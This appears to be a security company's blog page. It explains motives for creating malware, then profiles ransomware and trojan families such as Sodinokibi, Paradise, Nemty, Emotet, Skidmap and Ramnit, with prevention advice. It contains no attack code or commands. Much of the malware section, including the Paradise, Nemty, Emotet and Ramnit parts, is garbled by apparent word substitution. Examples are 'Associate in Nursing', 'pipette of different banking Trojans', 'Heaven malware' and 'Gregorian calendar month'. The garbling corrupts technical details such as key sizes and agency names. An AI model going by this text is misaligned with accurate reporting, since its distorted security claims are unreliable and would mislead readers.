Why Do People Create Viruses And Malware?
Some people create viruses and malware because they enjoy causing trouble, and making others suffer. Some malware can crash an entire network system and cause system outages for large companies, like banks or production companies.
Table of Contents
Why do People Create Computer Viruses?
-
To take control of a computer and use it for specific tasks
-
To generate money
-
To steal sensitive information (credit card numbers, passwords, personal details, data, etc.)
-
To prove a point, to prove it can be done, to prove one’s skill or for revenge purposes
-
To cripple a computer or network
To Take Control of a Computer and Use It for Specific Tasks
This is the most common type of virus, which is better classified as a trojan. These types of viruses are usually downloaded unknowingly by the computer user thinking that the file is something else, such as a file sent from an instant messenger friend or email attachment.
Once the host computer has been infected (known as a zombie computer), the trojan joins a private chat channel and awaits orders from its “Zombie Master”. This Zombie Master who is often the virus creator, will gather thousands of infected machines called a botnet and use them to mount attacks on web servers. The Zombie Master can command each of these infected computers will send a tiny bit of information to a web server – because there are potentially thousands of computers doing this at once, it often overloads the server.
The Zombie Master may want to do this to another website because it is a rival website, a figurehead website (such as whitehouse.gov) or it may be part of an extortion plan. “Send me $5000 or your Toy selling website will be offline over the Christmas holidays”.
The Zombie Master can also use these infected computers to send spam while the zombie master remains anonymous and the blame goes to the infected computers.
To Generate Money
These types of infections often masquerade as free spyware or virus removal tools (known as rogueware). Once ran, these fake applications will “scan” your computer and say it found has some viruses (even if there aren’t any) and in order to remove them, you must pay for the full version of the application. A good example of such an infection is called Myzor.fk which we have written about in the past.
Steal sensitive information
These types of viruses can sniff the traffic going in or out of a computer for interesting information such as passwords or credit card numbers and send it back to the virus creator. These types of viruses often use keylogging as a method of stealing information where it maintains a record of everything that is typed into the computer such as emails, passwords, home banking data, instant messenger chats, etc..
The above-mentioned methods also allow an attacker to gather an incredible amount of data about a person that can be used for identity theft purposes.
To Prove a Point, To Prove it Can Be Done, To Prove One’s Skill or For Revenge Purposes
A perfect example of this type of virus was the famous MS. Blaster virus (aka Lovesan) which infected hundreds of thousands of computers back in August 2003.
This virus would cause the system to restart after 60 seconds and had two hidden messages written in its code:
One was “I just want to say LOVE YOU SAN!!” which is why the virus is sometimes called Lovesan, and the other message was “billy gates why do you make this possible? Stop making money and fix your software!!”
It is believed that the purpose of this virus was to prove how easily exploitable a Windows system is.
To Cripple a Computer or Network
Few viruses now days are intended to disable a computer because it stops viruses’ ability to spread to other computers. Computer crippling viruses still exist, but nowhere near as common as the viruses mentioned above. The worst type of computer crippling viruses was back in the days of the 486 computers where the virus would overwrite the Master Boot Record (MBR) of the computer which would often prevent the computer from starting up at all.
Unlike computer crippling viruses, network crippling viruses are all too common nowadays. Most viruses that are designed to launch a Denial of Service attack will cause a significant load on a computer network, often bringing it down completely.
Here’s how people are making money with computer viruses
Bank account theft
Virus creators are more than happy to help themselves to your bank details, sneaking in to grab your login details or credit card info. They can either transfer your funds away or use your credit card details to go on a shopping spree. Sometimes they’ll leave the fun to another person though, and simply sell your details to the highest bidder.
Ransomware
Rather than a financial snatch and grab, sometimes a virus will encrypt your files and demand money for the unlock code. Without a true backup plan in place beforehand, you’re at their mercy. You’ll be given very helpful information on how to pay, plus a firm deadline before your files are destroyed permanently. Even if you pay, there is never a guarantee that your files will be back. Тhe best way to deal with ransomware is backups!
Ad swappers
A cheeky technique, this is when they create a virus that either puts annoying ads on websites you visit or places affiliate codes on pages so that when you buy something legitimately – eg, from Amazon – they get a percentage as a ‘referral fee’. Their kickback doesn’t make your purchase cost more and you may not even know you’re supporting their activities. This is a very common issue with free software, sometimes it comes with more than you asked for!
Bitcoin mining
You might have heard of digital currencies being used for payment, but did you know you can also earn them with your computer processing power? Unfortunately, sometimes ‘renting’ out your computer’s processing power means paying more in running costs than you’d make – unless you were very clever and sneaky, and used a virus to rent out other people’s computers. Certain websites with illegal content (we won’t mention them here!) used to install a piece of malware that would use up to 100% of computer resources when the computer was idle. Many people never even noticed it.
Botnets
Certain infected computers can be remotely controlled to do whatever the virus creator wants. In this case, they’ll usually set the infected bot computers to overwhelm a target web server, like an e-commerce store. Sometimes it’s done as revenge, but more often it’s blackmail. The ‘Botmaster’ says “pay me thousands of dollars or I’ll crash your site during the biggest shopping day of the year.” For example, imagine if Amazon’s website goes down for several hours during Christmas shopping time!
Account stealing
Subscription accounts like Netflix and Hulu are often hijacked, leaving you to pay the bill for someone else’s entertainment. But sometimes, virus creators go one step further with online gaming accounts. All those digital items that you fought so hard for (special clothing, weapons etc.) can carry real-world value and be stolen from your account and sold on a black market. Yes, that’s cheating!
Why do People Create malware?
Malware is the software you don’t want. It exists because someone created it. Maybe they thought it was fun, and they created it just to prove they could. Maybe they created it to annoy someone. Or maybe they created to make money, either directly, or by selling it to someone with a different motive.
When I say software you don’t want, I mean that although someone might want it, you don’t. That might include software designed to show you adverts while you are online, or software designed to spy on your computer activity, as part of industrial espionage or perhaps stalking.
Malware such as the recent cryptolocker ransomware is designed to make money directly – it hides the data on your computer, then demands money (in bitcoins) to allow you to recover it. Other malware might use your computer to send spam – advertising email that encourages people to buy a product or service, or it might take part in a denial-of-service attack against an individual or company. That might be for political reasons, or to embarrass them, or to hurt their business by preventing customers from using their website.
Sodinokibi Ransomware
Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.
Detected by Malwarebytes as Ransom. Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid-June and mid-July. Based on our telemetry, Sodinokibi has been on the rise since GandCrab’s exit at the end of May.
Table of Contents
ANALYSIS OF THE ATTACK
The initial infection vector used by the threat actor is a phishing email containing a malicious link. When pressed, the link downloads a supposedly legitimate zip file that is actually malicious. Sodinokibi zip files have a very low detection rate on Virus Total, which signals that the majority of antivirus vendors do not flag the initial payload as malicious. Since the initial Sodinokibi payload is able to pass undetected, the first layer of defense for many organizations is immediately bypassed. The zip file contains an obfuscated JavaScript file. When the user double clicks on the JavaScript file, WScript executes it. The JavaScript file deobfuscates itself by rearranging characters from a list called eiculwo, which is located in the JavaScript file. The variable vhtsxspmssj, located in the JavaScript file, is an obfuscated PowerShell script that will be deobfuscated by the attackers later on in the attack.
Type and source of infection
Ransom. Sodinokibi is ransomware that encrypts all the files on local drives except for those that are listed in their configuration file.
Targeted files have the extensions .jpg, .jpeg, .raw, .tif, .png, .bmp, .3dm, .max, .accdb, .db, .mdb, .dwg, .dxf, .cpp, .cs, .h, ,php, .asp, .rb, .java, .aaf, .aep, .aepx, .plb, .prel, .aet, .ppj, .gif, and .psd.
For more Cyber Security Information Contact us at help@theweborion.com
Paradiase Ransomware
The Paradise Ransomware is an encryption ransomware Trojan initially saw in the second seven day stretch of September 2017. The Paradise Ransomware is a piece of a Ransomware as a Service (RaaS) stage that incorporates dangers, for example, the TeslaWare. These administrations permit the swindlers to rent an outsider to make and oversee ransomware Trojans, which they can alter and disseminate contingent upon the objectives they need to assault. The individuals liable for the RaaS get a level of the benefits while dealing with overseeing installments and keeping up the modern.
The individual enlisting the administrations of the RaaS can pick the manner in which they will disperse the Paradise Ransomware. Some regular methods for conveying these dangers incorporate adulterated spam email connections and different traded off online sites and substance.
Following infiltration, Paradise encrypts stored facts the use of RSA-1024 cryptography and appends names of encrypted files with the “id-[affiliate_id].[affiliate_email].Paradise” extension. For example, “sample.Jpg” might be renamed to a filename such as “sample.Jpg-3VwVCmhU.[info@decrypt.Ws].Paradise“. Following hit encryption, Paradise creates 3 text files (“PARADISE_README_paradise@all-ransomware.Info.Txt“, “Files.Txt“, “Failed.Txt“, and “#DECRYPT MY FILES#.Txt“) placing them at the desktop.
Heaven malware has never been among the riskiest digital dangers. Notwithstanding, designers of ransomware chose to return with another adaptation. Security specialists revealed that toward the beginning of March the new infection variant began affixing [id-].[support@all-ransomware.info].sell document augmentation. Later forms despite everything utilize the equivalent unbreakable encryption technique. Thus, no one but reinforcements can help to completely get by after Paradise infection assault. Following the encryption, it likewise conveys a payoff note called #DECRYPT MY FILES# .html. Hooligans request to pay the payoff in Bitcoins.
At the point when Paradise ransomware contaminates your PC, it will check all the drive letters for focused document types, scramble them, and afterward attach an expansion to them. When these records are encoded, they will no longer ready to be opened by your typical projects. At the point when this ransomware has wrapped up the injured individual’s records, it will make a spring up deliver note which remembers guidelines for how you can make an installment.
how to secure your PC against heaven ransomware?
The primary purposes of PC diseases are poor information and indiscreet conduct. In this manner, be careful when perusing the Internet. Never open records got from suspicious messages or download programming from informal sources. On the off chance that conceivable, select the direct download URL, as opposed to utilizing outsider downloaders since these instruments regularly pack noxious/possibly undesirable applications. Besides, stay up with the latest and utilize a real enemy of infection/against spyware suite. The way to PC wellbeing is alert.
For greater cybersecurity data reach us at help@theweborion.com
Nemty Ransomware
Nemty ransomware is a crypto-malware maximum variation of witch are not decryptable due to AES-256 key scheduling insects alongside CBC block mode implementation. Nemty drops a ransom note that informs the sufferer what to do to get better their encrypted documents and deletes shadow copies of the documents it encrypts in a machine. According to Bleeping Computer’s very own tests, Nemty demands a ransom of 0.09981 bitcoin, which quantities to around US$1,000 as of writing.
The purpose of this ransomware is to code info saved on the gizmo in order that builders will create ransom demands by exploitation presenting paid recovery of files. NEMTY PROJECT additionally appends every file name with the “.Nemty” extension (e.G., “sample.Jpg” becomes “sample.Jpg.Nemty“). to boot, NEMTY PROJECT stores a text document named “NEMTY-DECRYPT.Txt” in most current folders. Associate in Nursing up so far variation of NEMTY Project ransomware appends filenames with the “._NEMTY_[random_characters]_” extension (e.G., “1.Jpg” -> “1.Jpg._NEMTY_huWhN62_“) and creates another document “_NEMTY_[random_characters]_-DECRYPT.Txt” (e.G., “_NEMTY_huWhN62_-DECRYPT.Txt“) containing Associate in Nursing equal message.
The decryptor presently supports only a limited amount of file extensions, however, Tesorion has told BleepingComputer that they are expanding help for greater report types every day. The document types currently supported by the decryptor are:
avi, bmp, gif, mp3, jpeg, jpg, mov, mp4, mov, mp4, qt, 3gp, mpeg, mpg, doc, docb, speck, ole, pot, pps, ppt, wbk, xlm, xls, xlsb, xlt, pdf, png, tif, tiff, nef, , doc, txt, docm, docx, dotm, dotx, container, potm, potx, ppsm, ppsx, pptm, pptx, xlsm, xlsx, xltm, xltx, zip
Rather than exhibiting a decryptor that processes a key on a sufferer’s PC, Tesorion picked to claim the decipherment key period finished on their horribly possess servers.
Tesorion told BleepingComputer they went this route in order to save you the ransomware developers from analyzing the decryptor and mastering the weak point of their set of rules.
File Encryption
Nemty ransomware makes use of an aggregate of AES-128 in CBC mode, RSA-2048, and the uncommon RSA-8192 for its report encryption and key protection. The following steps summarize its encryption process.
Generate a 32-byte value using a pseudo-random set of rules. This value is added to the configuration statistics later on. The first sixteen bytes are used as the primary AES key for document encryption.
Decrypt and import the embedded RSA-8192 Public Key the use of the identical RC4-base64 function.
Include the generated Private Key from step 2 to the configuration file, which additionally consists of other records accrued from the device (discussed within the next section)
Encrypt the configuration document the usage of RSA-8192 Public Key imported in step three and encode it in base64.
Generate another one6-byte key mistreatment the equal set of rules utilized in step 1. This can be the IV (Initialization Vector) for the AES-128 CBC mode secret writing. a replacement IV is generated for every record.
Encrypt the file contains the usage of the principle AES Key from step 1 and the cutting-edge IV.
Encrypt the modern-day IV using RSA-2048 with the regionally generated Public Key generated in step 2 and encode it in base64.
Append the encrypted IV to the file.
The quality way to avoid harm from ransomware infections is to maintain normal up to date backups.
For greater cybersecurity information touch us at help@theweborion.Com
Emotet Trojan
Emotet is a complicated, standard banking Trojan that primarily functions as a downloader or pipette of different banking Trojans. Emotet continues to be among the foremost pricey and harmful malware moving state, local, tribal, and territorial (SLTT) governments, and therefore the personal and public sectors.
Emotet is an advanced, modular banking Trojan that primarily features as a downloader or dropper of different banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that may evade usual signature-based detection. It has several techniques for maintaining persistence, inclusive of auto-begin registry keys and offerings. It makes use of modular Dynamic Link Libraries (DLLs) to continuously evolve and replace its capabilities. Furthermore, Emotet is Virtual Machine-aware and might generate false signs if run in a virtual environment.
The U.S. Department of Office of Homeland Security revealed associate degree alert on Emotet in Gregorian calendar month 2018, describing it as “an advanced, standard banking Trojan that primarily functions as a downloader or pipette of different banking Trojans,” and warning that it’s terribly tough to combat, capable of evading typical signature-based detection, and determined to unfold itself. The alert explains that “Emotet infections have price SLTT (state, local, tribal, and territorial) governments up to $1 million per incident to rectify.”
Emotet infections normally start with an easy phishing email that contains an attachment or a hyperlink to download a report. The recipient is persuaded to click the link or open the report and that they unwittingly set in motion a macro that downloads a malicious payload. As soon as the device is infected, Emotet starts seeking to spread to other devices on the network. Once Trojan. Emotet has inflamed a networked machine, it’ll propagate via enumerating community sources and write to share drives, in addition to brute pressure user money owed. Infected machines try to spread Emotet laterally through brute-forcing of area credentials, as well as externally thru its built-in spam module. As a result, the Emotet botnet is quite energetic and answerable for plenty of the malspam we encounter. The Trojan may additionally download the following modules to perform numerous tasks:
Banking module
Distributed denial of service (DDoS) module
Spam module
Email patron data stealer module
Browser info stealer module
Personal Storage Table (PST) data stealer module
Impact
Negative effects of Emotet contamination include
temporary or everlasting loss of touchy or proprietary data,
disruption to normal operations,
economic losses incurred to restore systems and documents, and
capability harm to an organization’s reputation.
Prevention techniques
Use a firewall to dam all incoming connections from the Internet to offerings that ought to now not be publicly available. By default, you have to deny all incoming connections and simplest allow services you explicitly want to provide to the outdoor world.
Enforce a password policy. Complex passwords make it hard to crack password files on compromised computers. This facilitates to save you or restrict harm while a laptop is compromised.
Ensure that applications and customers of the computer use the bottom stage of the privileges necessary to finish a task. When triggered for a root or UAC password, make certain that the program asking for administration-level access is a valid application.
Disable AutoPlay to prevent the automatic launching of executable files on network and detachable drives, and disconnect the drives when not required. If writing gets right of entry to isn’t required, allow read-best mode if the option is available.
Turn off document sharing if no longer needed. If file sharing is required, use ACLs and password protection to restrict get admission to. Disable anonymous get right of entry to shared folders. Grant gets the right of entry to most effective to user debts with strong passwords to folders that need to be shared.
Turn off and take away unnecessary services. By default, many operating structures deploy auxiliary offerings that are not critical. These services are avenues of attack. If they’re removed, threats have many fewer avenues of attack.
For extra Cybersecurity information contact us at help@theweborion.Com
Skidmap Malware Attack
Skid map, a Linux malware, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar.
Skidmap then installs multiple malicious binaries, the first minimizing the infected machine’s security settings so that it can begin mining cryptocurrency unhindered. TrendMicro warns that Skidmap “demonstrates the increasing complexity of recent cryptocurrency-mining threats”, pointing out that it is “notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar”.
The infection chain sees the Skidmap miner installing itself via crontab, then the malicious code downloads and executes the main binary. The malware decreases the security settings of the target systems by configuring the Security-Enhanced Linux (SELinux) module to the permissive mode or by disabling the SELinux policy and setting selected processes to run in confined domains. The miner also set up backdoor access to the infected system.
Skidmap also provides attackers with backdoor access to the infected machine.
“Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication.” continues the report.
In particular, one rootkit will fake network traffic and CPU-related statistics to make it appear that the machine is clean. This will include the creation of sham traffic involving particular ports, IP addresses, CPU loads and processes. A CPU with a heavy load is a well-known indicator of cryptocurrency mining as the power used to work out the mathematical puzzles required to secure digital coins is generally high. In Skidmap’s case, traffic information is faked to make CPU usage always appear low.
In addition, the malware is equipped with modules able to monitor cryptocurrency mining processes, hide specific files, and set up malicious cron jobs for executing other malicious files. The use of rootkits is an interesting development in the world of Linux-based cryptocurrency mining. Another recently-discovered Trojan sample, called InnfiRAT, was found to contain functionality specifically designed for the theft of cryptocurrency-related wallet credentials on infected machines.
Ramnit Malware
Ramnit is a family of malware-distribution trojans. Depending on unique versions, anti-virus suites can hit upon Ramnit as “Win32/Ramnit.A” or “Win32/Ramnit.B”. These viruses infiltrate structures without the user’s consent and open “backdoors” for different malware to infiltrate the machine. Therefore, its presence generally leads to further pc infections.
Ramnit is typically spread via flash drives and it all begins after the Worm (Win32/Ramnit) is copied with a random document name. The infection is at large at web sites that promise to provide keygen and cracks. If now not handled on time the Ramnit infects greater documents and the entire machine might eventually become unusable.
The first Ramnit variant that emerged in 2010 has been viruses that inflamed EXE, DLL and HTML files found on the computer. Later editions covered the capacity to thieve confidential facts from the infected machine. Ramnit became initially designed to attack bank accounts with the aid of infecting PCs and the use of them as proxy servers for malicious activity.
Depending on the variation, Ramnit-inflamed machines can also be enslaved in a botnet. Over time, the unique Ramnit malware has been changed so that newer variations include the capacity to serve as a backdoor and to speak with a command and control (C&C;) server, allowing an attacker to govern a botnet of Ramnit-infected machines. The combined sources of the Ramnit botnet allowed it to be used by its controller(s) to carry out different malicious actions, substantially stealing personal and banking information.
Ramnit is used to proliferate some of the viruses. These viruses have different developers and their conduct may also differ accordingly (some encrypt statistics, others steal records, cause similarly chain infections, etc.), however, all pose a direct danger to your privacy and laptop/data safety. Therefore, disposing of all viruses on the system is paramount.
How to eliminate Ramnit from your laptop?
This device through Symantec is specially designed to locate Ramnit from the computers. In order to use this device, one desires to be logged in as an admin and simplest then download the executable file from FxRamnit.Exe. The tool will routinely repair all the infected documents and additionally resets the registry values that have been tampered with. Moreover, the device can even terminate all the processes associated with Ramnit.
For extra cybersecurity, records contact us at help@theweborion.Com
